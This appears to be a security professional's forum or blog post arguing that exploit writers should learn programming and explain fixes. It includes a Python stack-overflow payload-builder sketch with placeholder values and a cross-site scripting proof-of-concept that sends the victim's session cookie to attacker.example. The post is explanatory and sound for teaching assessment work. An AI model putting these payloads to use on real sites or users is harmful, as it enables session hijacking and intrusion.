That said, I'd like to cite a recent blog post from SecurityBuddha.com (http://securitybuddha.com/2008/09/10/are-you-a-builder-or-a-breaker/). The point of the post is to ask why so many people in security focus on breaking things rather than building better software. I think learning to actually program in a language will be a much more valuable endeavor if you really want to learn to write exploits.
Why not learn how to spot weaknesses and offer fixes instead of just how to break things?
If you want to be a professional "breaker", then you are going to need to learn why the things you can break happen in the first place. Many of today's technologies are easy to break and harder to fix, especially on the web. Unless you have the knowledge to explain what went wrong, people will see you much more as a script kiddie than as a knowledgeable professional. Finding XSS exploits is pretty easy on many occasions; talking to the folks who own the vulnerable application and explaining strategic fixes, as well as what led to the problem, is where the money is.
On a separate note, in my opinion, learning a scripting language will probably help you with just about any type of exploit, unless everything you do is through a GUI. For the stuff I've written to exploit C applications, most of my code has been in Perl, and when I'm doing web-based assessments that go beyond the basics, I frequently pop back to Perl or Python to generate the code I'm going to use for the exploit. Plus, putting your exploit in a script makes it useful to others; unless you never plan on showing anyone what you did or doing it again yourself, it's nice to have it around, especially if you added a comment here or there or used logical variable names.
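To give a feel for what that kind of script looks like, here's a minimal sketch in Python of the classic stack-overflow payload-builder pattern. Everything specific in it is made up for illustration: the host, port, offset, and return address are placeholders you'd replace with values from your own analysis of a target.

```python
import socket
import struct

# Hypothetical values for illustration only -- in a real engagement
# these come from your own debugging of the vulnerable C application.
TARGET_HOST = "192.0.2.10"  # placeholder (TEST-NET address)
TARGET_PORT = 9999
OFFSET = 112                # bytes of padding until the saved return address
RET_ADDR = 0xDEADBEEF       # stand-in address, packed little-endian below

def build_payload(shellcode: bytes) -> bytes:
    """Pad up to the return address, overwrite it, then append a small
    NOP sled and the shellcode."""
    return (b"A" * OFFSET
            + struct.pack("<I", RET_ADDR)
            + b"\x90" * 16
            + shellcode)

payload = build_payload(b"\xcc" * 4)  # placeholder "shellcode" (int3 breakpoints)

# Once it's in a script, firing it again later (or handing it to a
# colleague) is trivial:
# with socket.create_connection((TARGET_HOST, TARGET_PORT)) as s:
#     s.sendall(payload)
```

The point isn't this particular payload; it's that the logical variable names and comments make the exploit reusable and self-explanatory the next time you, or anyone else, picks it up.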
Final thought on breaker vs. builder, since I've been on both sides: in many cases, and I run into this all the time, people don't really understand the magnitude or impact of a vulnerability until you show them how bad it is. It's kind of analogous to being a kid when a parent says "don't touch that, it's hot" and, sure enough, you figure it out on your own. Unless you can show what can happen in a controlled environment, you may not get the response you want. I think this is especially true for problems that don't yield a shell on a box. So many applications have XSS bugs in them these days. When you explain one to someone and they simplify it down to "so someone can click on a link and have some other stuff show up on the page?", it really doesn't sound that scary. When you show them that the link they clicked, for what they thought was the latest Peggle download in their web-based email client, actually let you steal their session cookie and gain full access to their email, that has a little more impact. I won't say a demo like that is necessary all of the time, but it is something I run up against.
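To make that demo concrete, the proof-of-concept link usually boils down to something like the sketch below. The vulnerable page, the "q" parameter, and attacker.example are all hypothetical stand-ins; the real details come from the application you're testing.

```python
from urllib.parse import quote

# Illustrative placeholders -- not a real site or parameter.
VULNERABLE_PAGE = "http://webmail.example/search"

# The injected script ships document.cookie (the session) off to a server
# the tester controls. This is what turns "some other stuff shows up on
# the page" into "I now have full access to your email".
payload = ('<script>new Image().src='
           '"http://attacker.example/c?"+document.cookie;</script>')

# URL-encode the payload so it survives as a query-string value.
poc_link = VULNERABLE_PAGE + "?q=" + quote(payload)
print(poc_link)  # dressed up, this becomes the "Peggle download" link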